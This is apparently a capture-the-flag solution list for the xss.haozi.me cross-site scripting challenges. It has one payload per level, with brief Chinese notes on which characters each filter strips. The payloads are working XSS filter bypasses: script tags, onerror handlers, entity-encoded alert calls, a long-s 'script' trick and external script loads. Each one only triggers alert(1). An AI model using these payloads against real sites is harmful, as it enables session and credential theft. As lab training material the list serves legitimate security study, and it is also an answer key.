xss.haozi

0X00

<a href=javascript:alert(1)>text</a>

0X01

</textarea><script>alert(1)</script><textarea>

0X02

"onclick="alert(1)

0X03

正常输⼊发现（）被过滤了
<script>alert`1`</script>

0X04

查看源码发现（）和`都被过滤了
<svg><script>alert&#40;1&#41;</script>

0X05

--!><script>alert(1)</script>

0X06

查看源码，正则表达式过滤了以auto或on开头，=结尾的字符串或>
发现换⾏符没被过滤
type="image" src onerror
=alert(1)

0X07

 <img src onerror='alert(1)'

0X08

0X09

 http://www.segmentfault.com"></script><img src onerror="alert(1)"

0X0A

https://www.segmentfault.com.haozi.me/j.js

0X0B

<img src onerror=&#97;&#108;&#101;&#114;&#116;(1)>

0X0C

<img src onerror=&#97;&#108;&#101;&#114;&#116;(1)>

0X0D

alert(1);
-->

0x0E

<ſcript src=https://www.segmentfault.com.haozi.me/j.js></script>

0x0F

  ');alert('1

0X10

alert(1)

0X11

");alert("1

0X12

</script>
<script>alert(1)</script>